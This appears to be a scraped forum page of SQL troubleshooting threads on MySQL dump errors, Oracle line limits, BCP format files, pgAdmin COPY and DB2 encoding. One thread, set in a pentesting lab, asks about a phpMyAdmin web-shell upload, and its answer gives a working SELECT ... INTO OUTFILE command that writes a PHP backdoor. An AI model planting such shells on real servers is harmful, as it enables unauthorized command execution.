MySQL Dump Error 1064 (42000) - sql

I have a MySQL dump from version 4.0.21. I converted it to UTF-8 so that special characters such as Ü, ü, Ä, ä, Ö, ö and ß survive. Now I have to import it into the latest MySQL version, 5.5.36. All data gets imported, but an error occurs at the end.
ERROR 1064 (42000) at line 80769: You have an error in your SQL syntax...use near '' at line 1
The empty string and the line numbers are confusing me. Importing with phpMyAdmin gives the same result as importing on the command line with:
mysql -u root -p bugtracker < E:\mantisUTF.dump
Importing the original dump from version 4.0.21 works perfectly, but without the special characters mentioned above.
First Lines of the dump file:
-- MySQL dump 9.11
--
-- Host: localhost Database: Mantis
-- ------------------------------------------------------
-- Server version 4.0.21-debug
--
-- Table structure for table `mantis_bug_file_table`
--
Last Lines (80768 & 80769):
INSERT INTO mantis_user_table VALUES (57,'fullName','firstName lastName','emailAdress','dd1875c93e8f17a24ebaf9c902b7165a','2014-01-29 13:43:21','2014-03-26 13:22:47',1,0,55,14,0,0,'1b886436b0c62598ab66e40ae89f0c016dc5777ebb601a73f2a07536281113ae'
Thanks in advance.
Relax

By rechecking my question I found the problem: a missing ')' at the end of the dump file.
Last line:
INSERT INTO mantis_user_table VALUES (57,'fullName','firstName lastName','emailAdress','dd1875c93e8f17a24ebaf9c902b7165a','2014-01-29 13:43:21','2014-03-26 13:22:47',1,0,55,14,0,0,'1b886436b0c62598ab66e40ae89f0c016dc5777ebb601a73f2a07536281113ae')
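If you want to catch a truncation like this before a long import, inspecting the tail of the dump is usually enough. A minimal sketch (PowerShell on Windows; the path is the one from the question):
# print the last two lines -- a complete dump should close its final INSERT with ")" (usually ");")
Get-Content E:\mantisUTF.dump -Tail 2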

Related

How to split a large query in command line?

I installed Oracle DB version 19c in my Docker environment and set up a database filled with dummy data. However, when I try to run a very large query I get the error:
SP2-0341: line overflow during variable substitution (>3000 characters at line 1).
I tried splitting it up with line breaks, but depending on how I split it I get all kinds of errors, such as:
ERROR at line 2: ORA-00933: SQL command not properly ended
or
ERROR at line 2:
SP2-0341: line overflow during variable substitution (>3000 characters at line 3)
The query is formatted as
SELECT AA.n_name AS AA_n_name, AA.n_nationkey AS ...
FROM nation AS AA FULL OUTER JOIN supplier...
WHERE (AC.p_partkey = ... AND...) OR((AC.p_partkey = ...)); -- The where part is over 5000 characters long--
Is there an alternative or a solution for tackling this on the command line? I tried running the query from a .sql file as well and hit a 4999-character limit. I am on an Ubuntu server, if that helps; any assistance would be appreciated.
It depends on the environment you're working in, but generally you can continue a command onto the next line by ending the line with a backslash (\).
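In SQL*Plus specifically (the tool raising SP2-0341 here), a SQL statement can simply continue on the next physical line without any continuation character, as long as no single line exceeds the limit and you never break inside a quoted literal. A rough sketch of the layout, using placeholder column names and values in place of the 5000-character WHERE clause from the question:
SELECT AA.n_name AS AA_n_name,
       AA.n_nationkey AS AA_n_nationkey
FROM nation AA
FULL OUTER JOIN supplier AB
  ON AA.n_nationkey = AB.s_nationkey
WHERE (AB.s_suppkey = 1 AND AB.s_nationkey = 2)
   OR (AB.s_suppkey = 3);
Note that Oracle does not accept AS in front of a table alias (FROM nation AS AA), which can itself raise an ORA-00933 independently of the line length.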

Troubleshooting BCP and Format File Errors

First off, sorry for the long post. I wanted to be thorough with my examples/data, and the bulk of this post is just that.
I inherited a Bulk Import Process using a format file (.fmt) at my new job. This process was created by the guy who worked here before me, and it is my job to learn it (and now fix it). I have limited knowledge of this stuff, but I have done some research, and after a few weeks I haven't really gotten anywhere. Here is what I am working with...
--BCP Command to import data from C:\Desktop\20180629_2377167_PR_NP.txt to table LA_Temp.dbo.ProvReg
bcp LA_Temp.dbo.ProvReg IN C:\Desktop\20180629_2377167_PR_NP.txt -f C:\Desktop\PROVREG.FMT -T -S SERVERNAME -k -m 1000000
--Table Structure which format file is created from:
SELECT [NPI]
,[D1]
,[EntityType]
,[D2]
,[ReplaceNPI]
,[D3]
,[ProvName]
,[D4]
,[MailAddr1]
,[D5]
,[MailAddr2]
,[D6]
,[MailCity]
,[D7]
,[MailState]
,[D8]
,[MailZip]
,[D9]
,[MailCountry]
,[D10]
,[MailPhone]
,[D11]
,[MailFax]
,[D12]
,[LocAddr1]
,[D13]
,[LocAddr2]
,[D14]
,[LocCity]
,[D15]
,[LocState]
,[D16]
,[LocZip]
,[D17]
,[LocCountry]
,[D18]
,[LocPhone]
,[D19]
,[LocFax]
,[D20]
,[Taxonomy1]
,[D21]
,[Taxonomy2]
,[D22]
,[Taxonomy3]
,[D23]
,[OtherProvID]
,[D24]
,[OtherProvIDType]
,[D25]
,[ProvEnumDate]
,[D26]
,[LastUpdate]
,[D27]
,[DeactivateRC]
,[D28]
,[DeactivateDate]
,[D29]
,[ReactivateDate]
,[D30]
,[Gender]
,[D31]
,[License]
,[D32]
,[LicenseState]
,[D33]
,[AuthorizedContact]
,[D34]
,[ContactTitle]
,[D35]
,[ContactPhone]
,[D36]
,[PanelOpen]
,[D37]
,[Language1]
,[D38]
,[Language2]
,[D39]
,[Language3]
,[D40]
,[Language4]
,[D41]
,[Language5]
,[D42]
,[AgeRestrict]
,[D43]
,[PCPMax]
,[D44]
,[PCPActual]
,[D45]
,[PCPAll]
,[D46]
,[EnrollInd]
,[D47]
,[EnrollDate]
,[D48]
,[FamilyOnly]
,[D49]
,[SubSpec1]
,[D50]
,[SubSpec2]
,[D51]
,[SubSpec3]
,[D52]
,[ContractName]
,[D53]
,[ContractBegin]
,[D54]
,[ContractEnd]
,[D55]
,[Parish1]
,[D56]
,[Parish2]
,[D57]
,[Parish3]
,[D58]
,[Parish4]
,[D59]
,[Parish5]
,[D60]
,[Parish6]
,[D61]
,[Parish7]
,[D62]
,[Parish8]
,[D63]
,[Parish9]
,[D64]
,[Parish10]
,[D65]
,[Parish11]
,[D66]
,[Parish12]
,[D67]
,[Parish13]
,[D68]
,[Parish14]
,[D69]
,[Parish15]
,[D70]
,[PCPInd]
,[D71]
,[DisplayOnline]
,[D72]
,[ExpAgeRestrict]
,[D73]
,[Suffix]
,[D74]
,[Title]
,[D75]
,[PrescriberInd]
,[Spaces]
,[End]
FROM [LA_Temp].[dbo].[ProvReg]
--Example Text File Data (this is one line)
9999999999 ^0^ ^ ^3800 HMA BLVD STE 305 ^ ^METAIRIE ^LA^70006 ^ ^5048729679^ ^3800 HMA BLVD ^ ^METAIRIE ^LA^70006 ^ ^9999999999^ ^207Q00000X^ ^ ^0000000^2001^ ^00000000^ ^00000000^00000000^F^ ^LA^ ^ ^ ^N^1^0^0^0^0^2^00000^00000^00000^ ^ ^ ^ ^ ^ ^000000000000000000000000000000^00000000^00000000^26^00^00^00^00^00^00^00^00^00^00^00^00^00^00^0^0^Accept patients of age 000-000^ ^MD ^ ^
--Format file
11.0
153
1 SQLCHAR 0 40 "\t" 1 NPI SQL_Latin1_General_Pref_CP1_CI_AS
2 SQLCHAR 0 2 "\t" 2 D1 SQL_Latin1_General_Pref_CP1_CI_AS
3 SQLCHAR 0 2 "\t" 3 EntityType
...all the way to...
153 SQLCHAR 0 2 "\r\n" 153 End
I have changed directories, the server name, and some of the text-file data to maintain security; however, it is very similar.
Here is the problem I am encountering:
With the "\t" used in the format file I just created from the SQL table, I get the error: [Microsoft][SQL Server Native Client 11.0]Unexpected EOF encountered in BCP data-file.
If I change this to just "" or "^" (as I think it should be, since the text file uses a caret delimiter), the rows begin to copy but fail with the error:
[Microsoft][SQL Server Native Client 11.0]String data, right truncation SQLState = 22001, NativeError = 0. BCP copy in failed.
If anyone can please point me in the right direction here for troubleshooting this issue, or if you see anything out of place, please let me know. As I mentioned, I have been at this for some time, and can use any suggestions I can get. Unfortunately, there is no one at my company I can ask about this.
Try adding the -e option to your bcp command. This gives you an error file in which BCP writes sample lines from the data file that it had problems with. It is very helpful for troubleshooting the type of error you are getting now (and you are correct to change your delimiter in the format file).
The error you are getting now, "string data, right truncation", is just what it states. However, the truncation can occur for a number of reasons. The destination table's columns may not be large enough to hold the data contained between the defined field delimiters. Delimiters may also appear inside your data, tricking the bcp utility into thinking a column has ended before it was meant to end in the file (this is less likely with the delimiter you are using, but you never know; I always prefer fixed width if possible). And, of course, the source may well have written you a file that contradicts whatever agreed-upon spec led you to define your destination as you have.
The error is accurate; the trick is finding where. Use the -e option to let BCP capture the problematic lines:
BCP table_dest IN "C:\FILE.TXT" -S SVR -T -f"C:\FORMAT_FILE.txt" -e"C:\ERROR_FILE.txt"
The "error_file.txt" will include line numbers and will include a sample of lines that it couldn't handle. Just copy and past to find in the file youare trying to load to see for yourself.
I strongly suggest using a more capable text editor. Do not use Windows Notepad or WordPad; use something like Notepad++ or UltraEdit to inspect ASCII text files.
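For reference, after switching the field terminator, the non-XML format file rows would look roughly like the sketch below. This is only a sketch: the collation is the one from the question, and the length column (40 / 2 here) may need to be increased so that it covers the widest padded field in the text file, since fields wider than the declared length (or than the destination columns) are a common source of the right-truncation error:
11.0
153
1    SQLCHAR  0  40  "^"     1    NPI         SQL_Latin1_General_Pref_CP1_CI_AS
2    SQLCHAR  0  2   "^"     2    D1          SQL_Latin1_General_Pref_CP1_CI_AS
3    SQLCHAR  0  2   "^"     3    EntityType  SQL_Latin1_General_Pref_CP1_CI_AS
...all the way to...
153  SQLCHAR  0  2   "\r\n"  153  End         SQL_Latin1_General_Pref_CP1_CI_AS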

php code injection in phpmyadmin

I'm toying with some pentesting VMs, and I'm trying a shell upload in phpMyAdmin.
The tutorial I'm trying to follow is http://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/
The question I have however is pure SQL - the command I'm trying to use:
SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\\xampp\\htdocs\\backdoor.php”
is producing the following error:
Error
There seems to be an error in your SQL query. The MySQL server error output below, if there is any, may also help you in diagnosing the problem
ERROR: Unknown Punctuation String # 9
STR: <?
SQL: SELECT “<?php system($_GET[‘cmd’]);SELECT “<?php system($_GET[‘cmd’]);SELECT “<?php system($_GET[‘cmd’]);
SQL query: Documentation
SELECT “<?php system($_GET[‘cmd’]);
MySQL said: Documentation
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?php system($_GET[‘cmd’])' at line 1
Any ideas how I could format it so that it is accepted?
The quotes were copied over dirty (typographic quotes instead of plain ASCII quotes). Replace them after pasting the snippet:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php";

Getting Internal Server Error on pgSQL

I'm trying to import data from a Windows CSV (comma-delimited) file into the pgSQL table faxtest1, but I keep getting an error saying "The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application."
The following is my code:
COPY faxtest1
FROM 'C:‪\Users\David\Desktop\test3.csv'
WITH DELIMITER AS ',' CSV ;
The CSV file is like:
Status,Fax ID
Fax to Email,2104
Fax to Email,2108
It is a bug in pgAdmin 4; hopefully they will fix it in the future.
In version 14, in the Import/Export Data function, there are two tabs, "Options" and "Columns". Try manually selecting the columns one at a time, separated by commas, and see if this bypasses the error.
It worked for me.
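If the pgAdmin dialog keeps failing, the same import can usually be done from psql with a client-side \copy instead of the GUI. A minimal sketch using the table and file from the question (HEADER is included because the CSV shown starts with a header row):
\copy faxtest1 FROM 'C:\Users\David\Desktop\test3.csv' WITH (FORMAT csv, HEADER)
Because \copy reads the file on the client side, it also avoids the server-side file permissions that a plain COPY ... FROM 'file' needs.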

DB2 database stores/reads umlauts and special chars wrong

I create my database with the following command:
db2 create database kixfs using codeset UTF-8 territory AT
My insert scripts (DMLs) are encoded in UTF-8.
Example insert statement from resources.dml:
INSERT INTO RESOURCES (RESOURCEKEY, LANGUAGE, CATEGORY, RESOURCEVALUE) VALUES ('XXXX', 'de', 'action', 'Funktion "Gerätemodell erfassen" erfolgreich ausgeführt.');
If I check the table content after running the script, the umlauts come back garbled:
Fehler bei der Ausführung der Funktion "Gerätemodell erfassen".
If I check the database configuration, everything looks fine (db2 get db cfg for MY_DB).
Any ideas why the data is stored or read incorrectly?
Edit:
I execute the insert script via a batch file from the DB2 admin console (CLP):
db2 -t -v -f resources.dml +o -z createTablesViews.log
Could it depend on the encoding of the DB2 terminal? And if so, how do I change it?
We had the same problem, also with a script. The script encoding has to match the server encoding, in our case ANSI, even if the database is UTF-8. Converting the script file to ANSI did the trick for us.
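A one-off conversion can be sketched with iconv where it is available (e.g. Git Bash or WSL on Windows), or by re-saving the file in an editor. The target code page below (CP1252) is an assumption; use whatever ANSI code page your CLP session actually runs in:
# convert the UTF-8 script to the code page the CLP session expects (CP1252 is an assumption)
iconv -f UTF-8 -t CP1252 resources.dml > resources_ansi.dml
# then run the converted file exactly as before
db2 -t -v -f resources_ansi.dml +o -z createTablesViews.log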